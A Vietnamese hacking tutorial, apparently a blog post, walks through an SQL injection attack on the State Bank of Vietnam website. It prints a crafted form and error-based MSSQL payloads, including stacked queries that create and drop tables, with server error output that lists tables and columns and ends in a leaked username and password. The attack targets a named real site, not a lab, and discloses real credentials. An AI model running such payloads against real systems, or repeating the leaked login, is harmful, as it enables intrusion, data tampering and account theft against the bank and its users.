hề hề ! Tại nghe đâu phong phanh là " Ngân Hàng Nhà Nước Việt Nam ( www.sbv.gov.vn )" bị dính Sql inject ... thấy chữ ngân hàng cũng tính mò dô xem xem thế nào lượng đi lượn lại vài dòng thấy chã có url nào khai thác được cả ... ! híc ! Thấy nãn nãn... !
Đang xem thì thấy mấy cái input dạng select .... nhìn nhìn hồi nghĩ thôi thữ đại xem sao biết đâu được
Chọn đại cái : http://www.sbv.gov.vn/home/hethongTCTDHT.asp
thấy cái select Tỉnh/Thành Phố ... thữ xem sao ! View source thấy 1 form như thế này :
Code:
<form name="Tim" method="post" action="hethongTCTDHT.asp" autocomplete="on">
<p align="right">Tỉnh / Thành phố:
<select size="1" name="lstTinh" style="font-family: Times New Roman; background-color:#FFFFFF; font-size:12pt" onchange="document.Tim.submit()">
<option value="ALL">Tất cả các tỉnh thành</option>
<option value="DANANG">Đà Nẵng</option>
<option value="DACLAC">Đắc Lắc</option>
<option value="DACNONG">Đắc Nông</option>
<option value="DONGNAI">Đồng Nai</option>
<option value="DONGTHAP">Đồng Tháp</option>
<option value="ANGIANG">An Giang</option>
<option value="BARIAVUNGTAU">Bà Rịa-Vũng Tàu</option>
<option value="BINHDINH">Bình Định</option>
<option value="BINHDUONG">Bình Dương</option>
<option value="BINHPHUOC">Bình Phước</option>
<option value="BINHTHUAN">Bình Thuận</option>
<option value="BACLIEU">Bạc Liêu</option>
<option value="BACCAN">Bắc Cạn</option>
<option value="BACGIANG">Bắc Giang</option>
<option value="BACNINH">Bắc Ninh</option>
<option value="BENTRE">Bến Tre</option>
<option value="CAMAU">Cà Mau</option>
<option value="CAOBANG">Cao Bằng</option>
<option value="GIALAI">Gia Lai</option>
<option value="HAGIANG">Hà Giang</option>
<option value="HANOI">Hà Nội</option>
<option value="HANAM">Hà Nam</option>
<option value="HATAY">Hà Tây</option>
<option value="HATINH">Hà Tĩnh</option>
<option value="HAIDUONG">Hải Dương</option>
<option value="HAIPHONG">Hải Phòng</option>
<option value="HAUGIANG">Hậu Giang</option>
<option value="HUNGYEN">Hưng Yên</option>
<option value="HOABINH">Hoà Bình</option>
<option value="KHANHHOA">Khánh Hoà</option>
<option value="KIENGIANG">Kiên Giang</option>
<option value="KONTUM">Kon Tum</option>
<option value="LAOCAI">Lào Cai</option>
<option value="LAMDONG">Lâm Đồng</option>
<option value="LANGSON">Lạng Sơn</option>
<option value="LAICHAU">Lai Châu</option>
<option value="LONGAN">Long An</option>
<option value="NAMDINH">Nam Định</option>
<option value="NGHEAN">Nghệ An</option>
<option value="NINHBINH">Ninh Bình</option>
<option value="NINHTHUAN">Ninh Thuận</option>
<option value="PHUTHO">Phú Thọ</option>
<option value="PHUYEN">Phú Yên</option>
<option value="QUANGBINH">Quảng Bình</option>
<option value="QUANGNAM">Quảng Nam</option>
<option value="QUANGNGAI">Quảng Ngãi</option>
<option value="QUANGNINH">Quảng Ninh</option>
<option value="QUANGTRI">Quảng Trị</option>
<option value="SOCTRANG">Sóc Trăng</option>
<option value="SONLA">Sơn La</option>
<option value="TAYNINH">Tây Ninh</option>
<option value="THAIBINH">Thái Bình</option>
<option value="THAINGUYEN">Thái Nguyên</option>
<option value="THUATHIENHUE">Thừa Thiên Huế</option>
<option value="THANHHOA">Thanh Hoá</option>
<option value="TIENGIANG">Tiền Giang</option>
<option value="TPHCM">TP Hồ Chí Minh</option>
<option value="TPHUE">TP Huế</option>
<option value="TRAVINH">Trà Vinh</option>
<option selected value="TW">Trung Ương</option>
<option value="TUYENQUANG">Tuyên Quang</option>
<option value="VINHLONG">Vĩnh Long</option>
<option value="VINHPHUC">Vĩnh Phúc</option>
<option value="YENBAI">Yên Bái</option>
</select></p>
</form>
Code:
<form name="Tim" method="post" action="http://www.sbv.gov.vn/home/hethongTCTDHT.asp" autocomplete="on">
<input type="text" size="100" name="lstTinh">
<input name="submit" type="submit" value="submit">
</form>
Code:
' or 1=(@@version)--
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int. /home/hethongTCTDHT.asp, line 172 |
Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables select @temp as id into langtu end-- |
Ok ! sau khi submit query trên ta sẽ được trả về http://www.sbv.gov.vn/home/hethongTCTDHT.asp và ko bị báo lỗi gì cả thì ta đã thành công !
Tiếp theo langtu sẽ select ra tất cả các table trong user data "dthai" mà sbv đang sữ dụng :
Code:
' or 1=(select id from langtu)--
Tự nhiên đang viết tut có hứng tới đây nó ra mẹ user + pass khó hiểu quá ! Quyết tìm hiểu xem vì sao lại thế chứ...
Trích:
' or 1=(select id from langtu)-- |
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cdeCSTT_LS/cdeCSTT_tbao_TPCP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_dienbienTG/CdeTCCB/cdeTTKS/DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Tygiabinhquan/Tygi... /home/hethongTCTDHT.asp, line 172 |
Bây giờ bạn hãy thữ nhìn lên cái error list ra các table coi ??? nó hiện ra ko đầy đủ đúng ko ?? cái :" Tygiabinhquan/Tygi... " có nghĩa là table nó dài quá ko list hết ra được !
hùhm,... giờ sao cho nó list hết ra nhĩ ??? OK langtu dùng substring
Trích:
' or 1=(select top 1 substring(id,1,100) from langtu)-- |
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cd' to a column of data type int. /home/hethongTCTDHT.asp, line 172 |
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
Trích:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'eCSTT_LS/cdeCSTT_tbao_TPCP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_dienbienTG/CdeTCCB/cdeTTKS/DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaob' to a column of data type int. /home/hethongTCTDHT.asp, line 172 |
Trích:
' or 1=(select top 1 substring(id,201,300) from langtu)-- |
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'properties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Tygiabinhquan/Tygiacheo/TygiaVCB/Vanban/webgrand/webgroup/webuser/CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/c' to a column of data type int. /home/hethongTCTDHT.asp, line 172 |
Bây giờ thì ta drop table langtu đi thôi : '; drop table langtu--
OK thành công ! Để lấy tất cả column trong table webuser ta lại tiếp tục insert 1 column @temp vào table webuser giống hồi nãy dậy ta ! type :
Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+column_name+'/' from information_schema.columns where table_name='webuser' select @temp as id into langtu end-- |
được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'uid/username/password/description/gid/grand/QL/uid/username/password/description/gid/grand/QL/' to a column of data type int. /home/hethongTCTDHT.asp, line 172 |
Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+username+':'+password+'/' from webuser select @temp as id into langtu end-- |
được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'levietcuong :lvc123 /' to a column of data type int. /home/hethongTCTDHT.asp, line 172 |
Author : langtuhaohoa ( HCEGroup.net )
0 nhận xét:
Post a Comment